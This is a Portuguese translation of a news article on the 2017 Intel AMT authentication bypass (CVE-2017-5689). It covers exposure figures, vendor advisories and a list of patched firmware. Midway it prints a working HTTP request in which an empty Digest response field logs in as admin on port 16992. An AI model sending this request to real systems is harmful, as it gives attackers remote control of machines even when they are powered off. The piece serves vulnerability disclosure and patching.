A vulnerabilidade na Intel AMT acabou sendo mais séria do que eles pensavam



Em 1 de maio de 2017, a Intel anunciou uma vulnerabilidade crítica na Active Management Technology (AMT) (vulnerabilidade INTEL-SA-00075, também conhecida como CVE-2017-5689 ). A vulnerabilidade foi encontrada por Maxim Malyutin da Embedi, mas a manteve em segredo a pedido da Intel até o anúncio oficial.

O Intel AMT é uma tecnologia de hardware que fornece acesso remoto e fora de banda (por meio de um canal TCP / IP auxiliar independente) para gerenciar as configurações e a segurança do computador, independentemente do status da energia (computador ligado / desligado) e do estado do sistema operacional. A tecnologia está integrada no chipset. Se você o usar como um anti-rootkit para verificar unidades de RAM e PC, não há como burlar essa proteção. Pior, as solicitações remotas de AMT não são registradas.

Agora, a solicitação da Shodan é emitida por mais de 8500 sistemas com portas AMT abertas. Para alguns firmware do BIOS, ainda não foram lançados os patches que corrigem o erro no AMT.

A tecnologia AMT permite que os administradores do sistema executem várias ações remotamente no sistema: desligue computadores, altere o código do carregador de inicialização, controle dispositivos de entrada, programas executáveis ​​etc. Na verdade, a AMT permite executar remotamente todas as ações que você pode executar, Ter acesso físico ao PC.

Depois de ler a descrição da tecnologia, você pode começar a fantasiar que oportunidades um hacker obtém ao ter acesso remoto a um computador desligado com a tecnologia AMT. Então, suas fantasias se tornaram realidade . O acesso remoto à AMT é fornecido através de uma interface da web em um navegador. Como Maxim descobriu, qualquer hash criptográfico ou nenhum é adequado para autenticação de resumo de acesso . Ou seja, o campo correspondente no formulário de autorização geralmente pode ser deixado em branco.

Nem parece um backdoor, porque quem o implementará de uma maneira tão desajeitada?

Sistemas vulneráveis ​​após o lançamento de 2010-2011 (lista de firmware vulnerável, veja abaixo). Isso não é 100% RCE, mas uma vulnerabilidade lógica. Maxim Malyutin acredita que existem vários vetores de ataque, como um invasor pode explorar essa vulnerabilidade, possivelmente até em sistemas Intel sem o suporte da Intel AMT.

"A autenticação ainda funciona " , explicou Malyutin. "Acabamos de encontrar uma maneira de contornar isso."

Por meio de um navegador da web, você pode obter acesso total às funções da AMT, como se reconhecesse a senha de administrador no sistema. Veja como fazer isso usando o proxy local em 127.0.0.1:16992:

GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth" Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 

Alguns dias após a divulgação das informações, o Tenact lançou uma exploração por explorar uma vulnerabilidade crítica com um aumento nos privilégios da AMT. A empresa sugeriu o uso dessa ferramenta para detectar sistemas vulneráveis ​​em sua rede. Para que os administradores de sistema saibam onde instalar novas versões de firmware. A exploração é implementada como um plugin do Nessus .

Nos mesmos dias, os maiores fabricantes de servidores e computadores pessoais emitiram mensagens de segurança oficiais para seus clientes: uma mensagem da HP , da Dell , da Lenovo , da Fujitsu . Haverá informações detalhadas sobre firmware vulnerável e os links para versões atualizadas aparecerão assim que estiverem disponíveis.

Lista de firmware corrigido da Intel
Versões vulneráveis
firmware
Relevante
Geração de CPU
Remendado
firmware
6.0.xx.xxxx

Gen Core

6.2.61.3535

6.1.xx.xxxx

6.2.61.3535

6.2.xx.xxxx

6.2.61.3535

7.0.xx.xxxx

Gen Core

7.1.91.3272

7.1.xx.xxxx

7.1.91.3272

8.0.xx.xxxx

Terceiro Gen Core

8.1.71.3608

8.1.xx.xxxx

8.1.71.3608

9.0.xx.xxxx

Núcleo da Geração



9.1.41.3024

9.1.xx.xxxx

9.1.41.3024

9.5.xx.xxxx

9.5.61.3012

10.0.xx.xxxx

Núcleo da 5ª Geração

10.0.55.3000

11.0.xx.xxxx

Núcleo da 6ª geração

11.0.25.3001

11.0.22.3001

11.0.18.3003

11.5.xx.xxxx

Núcleo da geração

11.6.27.3264

11.6.xx.xxxx

11.6.27.3264

11.6.12.3202

A Intel lançou uma ferramenta oficial para verificar se há vulnerabilidades no sistema no Windows 7/10, bem como um guia para seu uso.

Source: https://habr.com/ru/post/pt403713/


All Articles